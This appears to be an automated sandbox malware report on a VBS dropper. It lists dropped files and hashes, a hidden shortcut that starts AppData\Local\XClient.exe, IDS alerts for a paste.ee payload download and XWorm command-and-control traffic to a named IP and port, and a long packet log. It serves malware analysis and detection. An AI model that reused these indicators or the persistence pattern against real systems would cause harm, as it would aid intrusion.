                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                                                    • Filename: RqYh.exe, Detection: malicious, Browse
                                                                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: cinxa7dbiq.exe, Detection: malicious, Browse
                                                                                                    • Filename: 7va1lgSJFv.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Trojan.Siggen18.41021.9404.23168.exe, Detection: malicious, Browse
                                                                                                    • Filename: LisectAVT_2403002A_60.exe, Detection: malicious, Browse
                                                                                                    • Filename: LisectAVT_2403002A_348.exe, Detection: malicious, Browse
                                                                                                    • Filename: af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe, Detection: malicious, Browse
                                                                                                    • Filename: Db1Z06qMmP6G0Dk.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 05:56:27 2024, mtime=Mon Oct 7 05:56:27 2024, atime=Mon Oct 7 05:56:27 2024, length=262432, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):944
                                                                                                    Entropy (8bit):5.051576376683252
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:8it604jx0kChNablZ0RgWXTwjAXUme1GFawuL+qWoqW64t2YZ/elFlSJmkmV:8i4jLF6RroAXUmeleq9qhqygm
                                                                                                    MD5:F5002360AC433EFBED37926F4E6F026A
                                                                                                    SHA1:E5F27863AA47C118FD064CBEDF87CB32B9051610
                                                                                                    SHA-256:DC9ADD3E45F39093BE2AC791E8695AC6EABE50785CCA9D46D751C4DBED801F65
                                                                                                    SHA-512:39FA42F412CA4250A59882C8DE3308E5480C1E0536AB24A4948BF8019828E866A1979F73B58A10253396328CA5070FC7C549FD4767235FB4D46E8AD1EBF83A29
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.... ...z.......z.......z....... .......................p.:..DG..Yr?.D..U..k0.&...&.......y.Yd....-.....j3..........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BGY.7..........................d...A.p.p.D.a.t.a...B.P.1.....GY.6..Local.<......EW)BGY.7.........................M...L.o.c.a.l.....b.2. ...GY.7 .XClient.exe.H......GY.7GY.7.....).....................s(.X.C.l.i.e.n.t...e.x.e.......X...............-.......W..............W.....C:\Users\user\AppData\Local\XClient.exe..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.X.C.l.i.e.n.t...e.x.e.........|....I.J.H..K..:...`.......X.......258555...........hT..CrF.f4... .S..Yc...,...E...hT..CrF.f4... .S..Yc...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                    Process:C:\Users\user\AppData\Local\XClient.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):298
                                                                                                    Entropy (8bit):4.924206445966445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
                                                                                                    MD5:932782CF70ED00D22C0B08B5027B4E31
                                                                                                    SHA1:78F460A2155D9E819B8452C281285D7E0A7AC14F
                                                                                                    SHA-256:F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
                                                                                                    SHA-512:C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
                                                                                                    Malicious:false
                                                                                                    Preview:Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                                                                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Entropy (8bit):3.736232630207971
                                                                                                    TrID:
                                                                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                    • MP3 audio (1001/1) 32.22%
                                                                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                                                                    • Corel Photo Paint (41/41) 1.32%
                                                                                                    File name:k4STQvJ6rV.vbs
                                                                                                    File size:496'944 bytes
                                                                                                    MD5:e1cadf5476665ac4d120fea85cb6da31
                                                                                                    SHA1:e5675a315a6dae625d638dfddc3994c7eef317df
                                                                                                    SHA256:a5fe6a6bb32827bf867aec2200c568e2015e233a6474292049c16400771fb6d9
                                                                                                    SHA512:dec3716c024f6f9e2e6dc13a79bca1ed815b5335b6b0ac88900637723ccb4bfe4590b70bd5162ab748bff7cdb3adfa83bdac423b9c5e3e9d42405ae34645dfac
                                                                                                    SSDEEP:12288:4LwS7TIaWglrDF6R0kTOB90kKw0UBC8TtFAN5tdGkEmfG0Xi46DlAo5m:/G9Jf4S3e
                                                                                                    TLSH:2DB4091135EAB048F1F32FA356ED55F94FABB5652A36912E7048070B4BA3E80CE51B73
                                                                                                    File Content Preview:..G.T.o.K.r.Q.L.C.K.P.K.I.f.k.W.m.m.z.i.L.k.e.i.r.K.p.k.o.U.u.m.L.T.m.i.c.o.h.c.i.L.o.I.c.G.d.W.i.g.W.A.Q.a.K.L.N.i.G.K.K.C.C.W.f.i.U.z.L. .=. .".o.L.A.Q.b.B.x.H.i.L.U.P.G.k.G.l.c.e.W.L.c.G.e.G.R.N.U.K.h.J.L.C.K.N.R.G.G.N.t.h.r.L.q.d.W.Z.o.k.l.d.N.o.n.l.W
                                                                                                    Icon Hash:68d69b8f86ab9a86
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-07T08:56:23.880852+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.849709188.114.97.3443TCP
                                                                                                    2024-10-07T08:56:24.034666+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11188.114.97.3443192.168.2.849709TCP
                                                                                                    2024-10-07T08:57:48.223217+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84972593.123.39.7620506TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 7, 2024 08:55:58.581626892 CEST49676443192.168.2.852.182.143.211
                                                                                                    Oct 7, 2024 08:55:58.675625086 CEST49673443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:55:59.034800053 CEST49672443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:55:59.831732988 CEST49671443192.168.2.8204.79.197.203
                                                                                                    Oct 7, 2024 08:56:00.191302061 CEST4967780192.168.2.8192.229.211.108
                                                                                                    Oct 7, 2024 08:56:08.191036940 CEST49676443192.168.2.852.182.143.211
                                                                                                    Oct 7, 2024 08:56:08.284828901 CEST49673443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:08.644170046 CEST49672443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:10.292762041 CEST4434970423.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:10.292891026 CEST49704443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:10.816015959 CEST4967780192.168.2.8192.229.211.108
                                                                                                    Oct 7, 2024 08:56:19.944415092 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:19.944514036 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:19.944588900 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:19.953253984 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:19.953290939 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.419610023 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.419725895 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.490010023 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.490096092 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.490330935 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.534779072 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.612554073 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.659415007 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708084106 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708349943 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708384037 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708414078 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708412886 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.708451986 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708507061 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.708523035 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708576918 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.708797932 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708888054 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708914995 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708944082 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.708964109 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.708986998 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.709012032 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.724003077 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.724057913 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.724066973 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.784769058 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.800998926 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801264048 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801361084 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801456928 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801456928 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.801470041 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801512957 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801527977 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.801543951 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801574945 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.801598072 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801631927 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801661968 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.801666975 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801677942 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.801744938 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.802208900 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.802272081 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.802285910 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.802386999 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.802464962 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.802469969 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.802493095 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.802608013 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.802620888 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803026915 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803061008 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803093910 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803106070 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.803126097 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803152084 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.803173065 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803203106 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803216934 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.803231955 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.803292990 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890218019 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890227079 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890255928 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890289068 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890330076 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890356064 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890382051 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890830994 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890849113 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890887976 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890897989 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.890914917 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.890938044 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.892374039 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.892390966 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.892443895 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.892452955 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.892535925 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.944346905 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.944366932 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.944428921 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.944441080 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.944469929 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.944492102 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.978540897 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978565931 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978630066 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.978641033 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978703976 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.978877068 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978893042 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978933096 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.978940010 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.978972912 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.978981018 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.979687929 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.979707003 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.979752064 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.979760885 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.979926109 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.980546951 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.980561972 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.980609894 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.980618954 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.980652094 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.980678082 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.981384039 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.981400967 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.981472969 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.981482029 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.981564999 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.982327938 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.982342005 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.982397079 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.982403994 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:20.982431889 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:20.982451916 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.066905975 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.066965103 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.066981077 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.066992044 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067029953 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067048073 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067153931 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067179918 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067218065 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067224026 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067255974 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067281961 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067573071 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067591906 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067640066 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.067647934 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067966938 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.067990065 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.068011999 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.068020105 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.068048000 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.068089962 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072112083 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072158098 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072196960 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072205067 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072235107 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072258949 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072462082 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072503090 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072530031 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072536945 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072575092 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072585106 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072618008 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072637081 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072695017 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.072702885 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.072798967 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.073215008 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.073231936 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.073276997 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.073285103 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.073312044 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.073333025 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155313969 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155376911 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155410051 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155436993 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155455112 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155469894 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155666113 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155685902 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155719042 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155729055 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155754089 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155769110 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155800104 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155821085 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155846119 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155853033 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.155875921 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.155890942 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156063080 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156078100 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156120062 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156131029 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156157970 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156176090 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156457901 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156475067 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156521082 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156531096 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156559944 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156574965 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156673908 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156687975 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156725883 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.156735897 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.156799078 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.157253981 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157269955 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157330036 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.157341003 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157402039 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.157706022 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157726049 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157779932 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.157793045 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.157825947 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.157845020 CEST49708443192.168.2.8185.199.108.133
                                                                                                    Oct 7, 2024 08:56:21.250929117 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.250981092 CEST44349708185.199.108.133192.168.2.8
                                                                                                    Oct 7, 2024 08:56:21.251025915 CEST49708443192.168.2.8185.199.108.133
